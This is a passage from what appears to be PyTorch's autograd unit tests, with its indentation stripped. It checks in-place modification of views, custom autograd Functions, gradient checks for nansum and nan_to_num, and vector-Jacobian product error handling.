maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b inplace for gracheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertTrue(torch.allclose(non_inplace_grad, inplace_grad))
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks that multiples views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks custom autograd.Function that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.sum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement the backward"):
BadBw.apply(inp).sum().backward()
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
def gradgradcheck_method_precision_override(test_name):
# these are just empirical observations, we should improve
gradgradcheck_precision_override = {
'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
}
non_broadcasted_test_name = test_name.split("_broadcast")[0]
override = gradgradcheck_precision_override.get(non_broadcasted_test_name)
if override:
if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
# errors accumulated across 1 dimension
override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
elif 'broadcast_all' in test_name:
# errors accumulated across multiple dimensions
override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
input_variables, run_gradgradcheck=True, check_batched_grad=True,
check_forward_ad=False):
test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
check_batched_grad=check_batched_grad, check_forward_ad=check_forward_ad))
gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name)
if gradgradcheck_precision_override is not None:
atol = gradgradcheck_precision_override['atol']
rtol = gradgradcheck_precision_override['rtol']
test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
else:
test_case.assertTrue(gradgradcheck(apply_method, input_variables,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
f_args_variable, f_args_tensor, *, check_forward_ad=False):
output_variable = apply_fn(*f_args_variable)
if run_grad_checks:
run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
output_variable, f_args_variable, check_forward_ad=check_forward_ad)
self_variable = f_args_variable[0]
if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None:
output_variable.backward(randn_like(output_variable))
test_case.assertEqualTypeString(self_variable, self_variable.grad)
test_case.assertEqual(self_variable.size(), self_variable.grad.size())
class TestAutogradComplex(TestCase):
def test_view_func_for_complex_views(self):
# case 1: both parent and child have view_func
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
x0 = x.clone()
x1 = torch.view_as_complex(x0)
x2 = torch.view_as_real(x1)
x2.mul_(2)
x2.sum().backward()
y0 = y.clone()
y0.mul_(2)
y0.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 2: parent has view_func but child does not
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a):
b = a.clone()
b1 = torch.view_as_complex(b)
b2 = b1.reshape(b1.numel())
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 3: parent does not have a view_func but child does
x = torch.randn(10, dtype=torch.cdouble, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a, dim0_size=5):
b = a.clone()
b1 = b.reshape(dim0_size, 2)
b2 = torch.view_as_real(b1)
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
def test_view_with_multi_output(self):
x = torch.randn(2, 2, 2, dtype=torch.double)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
x.requires_grad_(True)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
def as_identity(self):
# view_as_real and view_as_complex behavior should be like an identity
def func(z):
z_ = torch.view_as_complex(z)
z_select = torch.select(z_, z_.dim() - 1, 0)
z_select_real = torch.view_as_real(z_select)
return z_select_real.sum()
z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True)
gradcheck(func, [z])
func(z).backward()
z1 = z.clone().detach().requires_grad_(True)
torch.select(z1, z1.dim() - 2, 0).sum().backward()
self.assertEqual(z.grad, z1.grad)
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
